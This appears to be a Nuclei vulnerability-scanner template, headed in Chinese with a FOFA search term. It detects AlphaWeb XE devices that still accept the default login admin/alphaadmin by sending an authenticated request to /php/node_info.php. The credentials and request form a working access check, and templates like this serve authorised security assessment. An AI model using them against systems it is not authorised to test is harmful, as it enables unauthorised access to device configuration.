漏洞描述
An AlphaWeb XE default login was discovered.
fofa: alphaweb
id: alphaweb-default-login
info:
name: AlphaWeb XE Default Login
author: Lark Lab
severity: medium
description: An AlphaWeb XE default login was discovered.
reference:
- https://wiki.zenitel.com/wiki/AlphaWeb
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cwe-id: CWE-522
metadata:
max-request: 1
tags: default-login,AlphaWeb,vuln
http:
- raw:
- |
GET /php/node_info.php HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
Referer: {{BaseURL}}
attack: pitchfork
payloads:
username:
- admin
password:
- alphaadmin
matchers-condition: and
matchers:
- type: word
words:
- "HW Configuration"
- "SW Configuration"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022000ca1baea4366134463aa9c4c499e6a23149f9258e6e195a09ac6438ed5ca049022100b638296c522741b3f49a688fe281b3f2c9bb75c30004c3855cb6649e031c1de7:922c64590222798bb761d5b6d8e72950